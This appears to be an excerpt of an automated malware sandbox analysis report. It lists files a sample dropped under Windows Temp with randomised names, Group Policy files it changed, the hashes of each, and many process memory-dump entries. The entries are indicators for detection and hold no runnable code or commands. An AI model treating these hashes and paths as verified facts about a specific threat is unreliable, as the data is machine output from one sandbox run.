C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dll
Filesize: 6.2MB
MD5: e352e328cf687644c8721e2630bedfe8
SHA1: 0e1b2807bf28d072db7856ece995eb831009b6b1
SHA256: 77e09b3ab0ac968ff1785cc52cac7285e8839d616dfef672fe77387cd31b8f3a
SHA512: 3a2e8a83cec2f899ff7fe8aadaf8789e2f34010261708b514944811b2fa9a65cf4805ea2d683ae951506779cc94ee8ae61601f49bcd5353c1e779e34dbbc2d13
-
C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exe
Filesize: 6.7MB
MD5: a3a5844f879f532ab98d5ba18ca099bf
SHA1: 12d23302494fcb3a45c0e43c56bc100dbfda84ad
SHA256: c0d938a16e6e3f34e89df5588f6ac47c9ab57e8b25a210f34944679776c919a1
SHA512: b83086d378fa26dd057b8c683b57fd89db2f6d2a6f7d1dca9ecf66efc097fd8310a0e567da8965c6769d9eee3ade6933ee7a795d04bb20f6d15d7ec3464630a7
-
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
Filesize: 5KB
MD5: 258904a9ef758b7f35ae1fd7a58a00c6
SHA1: 7bff985b035af3456185e6021b08b1d94aec76ac
SHA256: cb09dda385ea1354cab67af6b7824ec8322073ca6d523985bc3a05de08e8169f
SHA512: ff92029c342f5e2766078922ceaa7b2593e76db4e879579fedff1199150191b894d1eda61634ac1c2de925d109cac2203a3e767357afd7edf38e68428b1580ec
-
C:\Windows\system32\GroupPolicy\gpt.ini
Filesize: 268B
MD5: a62ce44a33f1c05fc2d340ea0ca118a4
SHA1: 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256: 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512: 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
memory/228-200-0x0000000000000000-mapping.dmp
-
memory/240-202-0x0000000000000000-mapping.dmp
-
memory/584-186-0x0000000000000000-mapping.dmp
-
memory/616-171-0x0000000000000000-mapping.dmp
-
memory/672-142-0x0000000000000000-mapping.dmp
-
memory/992-191-0x0000000000000000-mapping.dmp
-
memory/992-148-0x0000000000000000-mapping.dmp
-
memory/1116-205-0x0000000000000000-mapping.dmp
-
memory/1152-215-0x0000000000000000-mapping.dmp
-
memory/1264-185-0x0000000000000000-mapping.dmp
-
memory/1452-147-0x0000000000000000-mapping.dmp
-
memory/1484-146-0x0000000000000000-mapping.dmp
-
memory/1504-143-0x0000000000000000-mapping.dmp
-
memory/1508-173-0x0000000000000000-mapping.dmp
-
memory/1512-204-0x0000000000000000-mapping.dmp
-
memory/1612-187-0x0000000000000000-mapping.dmp
-
memory/1656-184-0x0000000000000000-mapping.dmp
-
memory/1816-221-0x0000000000000000-mapping.dmp
-
memory/1928-193-0x0000000000000000-mapping.dmp
-
memory/1968-177-0x0000000000000000-mapping.dmp
-
memory/2000-172-0x0000000000000000-mapping.dmp
-
memory/2192-175-0x0000000000000000-mapping.dmp
-
memory/2264-181-0x0000000000000000-mapping.dmp
-
memory/2268-150-0x0000000000000000-mapping.dmp
-
memory/2324-201-0x0000000000000000-mapping.dmp
-
memory/2356-144-0x0000000000000000-mapping.dmp
-
memory/2356-190-0x0000000000000000-mapping.dmp
-
memory/2392-213-0x0000000000000000-mapping.dmp
-
memory/2452-162-0x0000000000000000-mapping.dmp
-
memory/2452-168-0x00000000053B0000-0x00000000053CE000-memory.dmp
Filesize: 120KB
-
memory/2452-164-0x00000000047B0000-0x0000000004DD8000-memory.dmp
Filesize: 6.2MB
-
memory/2452-163-0x0000000001A60000-0x0000000001A96000-memory.dmp
Filesize: 216KB
-
memory/2452-165-0x0000000004400000-0x0000000004422000-memory.dmp
Filesize: 136KB
-
memory/2452-166-0x00000000045A0000-0x0000000004606000-memory.dmp
Filesize: 408KB
-
memory/2452-167-0x0000000004740000-0x00000000047A6000-memory.dmp
Filesize: 408KB
-
memory/2496-216-0x0000000000000000-mapping.dmp
-
memory/2568-152-0x0000000000000000-mapping.dmp
-
memory/2624-188-0x0000000000000000-mapping.dmp
-
memory/2664-155-0x0000000000000000-mapping.dmp
-
memory/2844-149-0x0000000000000000-mapping.dmp
-
memory/2852-192-0x0000000000000000-mapping.dmp
-
memory/2856-198-0x0000000000000000-mapping.dmp
-
memory/2872-176-0x0000000000000000-mapping.dmp
-
memory/3092-203-0x0000000000000000-mapping.dmp
-
memory/3236-179-0x0000000000000000-mapping.dmp
-
memory/3248-180-0x0000000000000000-mapping.dmp
-
memory/3468-141-0x0000000000000000-mapping.dmp
-
memory/3544-197-0x0000000000000000-mapping.dmp
-
memory/3736-151-0x00000196AA740000-0x00000196AA762000-memory.dmp
Filesize: 136KB
-
memory/3736-154-0x00007FFBA6E80000-0x00007FFBA7941000-memory.dmp
Filesize: 10.8MB
-
memory/3736-153-0x00007FFBA6E80000-0x00007FFBA7941000-memory.dmp
Filesize: 10.8MB
-
memory/3764-170-0x0000000000000000-mapping.dmp
-
memory/3808-222-0x0000000000000000-mapping.dmp
-
memory/3828-159-0x0000000010000000-0x00000000119C6000-memory.dmp
Filesize: 25.8MB
-
memory/3852-169-0x0000000000000000-mapping.dmp
-
memory/3860-145-0x0000000000000000-mapping.dmp
-
memory/3912-211-0x0000000000000000-mapping.dmp
-
memory/3916-212-0x0000000000000000-mapping.dmp
-
memory/3928-174-0x0000000000000000-mapping.dmp
-
memory/4040-209-0x0000000000000000-mapping.dmp
-
memory/4080-208-0x0000000000000000-mapping.dmp
-
memory/4152-199-0x0000000000000000-mapping.dmp
-
memory/4280-156-0x0000000000000000-mapping.dmp
-
memory/4312-220-0x00007FFBA66C0000-0x00007FFBA7181000-memory.dmp
Filesize: 10.8MB
-
memory/4316-178-0x0000000000000000-mapping.dmp
-
memory/4428-206-0x0000000000000000-mapping.dmp
-
memory/4480-189-0x0000000000000000-mapping.dmp
-
memory/4568-219-0x0000000000000000-mapping.dmp
-
memory/4724-207-0x0000000000000000-mapping.dmp
-
memory/4748-210-0x0000000000000000-mapping.dmp
-
memory/4868-135-0x0000000000000000-mapping.dmp
-
memory/4868-138-0x0000000010000000-0x00000000119C6000-memory.dmp
Filesize: 25.8MB
-
memory/4920-183-0x0000000000000000-mapping.dmp
-
memory/4960-132-0x0000000000000000-mapping.dmp
-
memory/4968-182-0x0000000000000000-mapping.dmp
-
memory/4992-249-0x0000000001700000-0x00000000030C6000-memory.dmp
Filesize: 25.8MB
-
memory/5052-194-0x0000000000000000-mapping.dmp
-
memory/5080-232-0x000000000B5B0000-0x000000000B613000-memory.dmp
Filesize: 396KB
-
memory/5080-242-0x000000000BFA0000-0x000000000C01B000-memory.dmp
Filesize: 492KB
-
memory/5080-228-0x000000000B2D0000-0x000000000B355000-memory.dmp
Filesize: 532KB
-
memory/5080-246-0x000000000CE60000-0x000000000CF15000-memory.dmp
Filesize: 724KB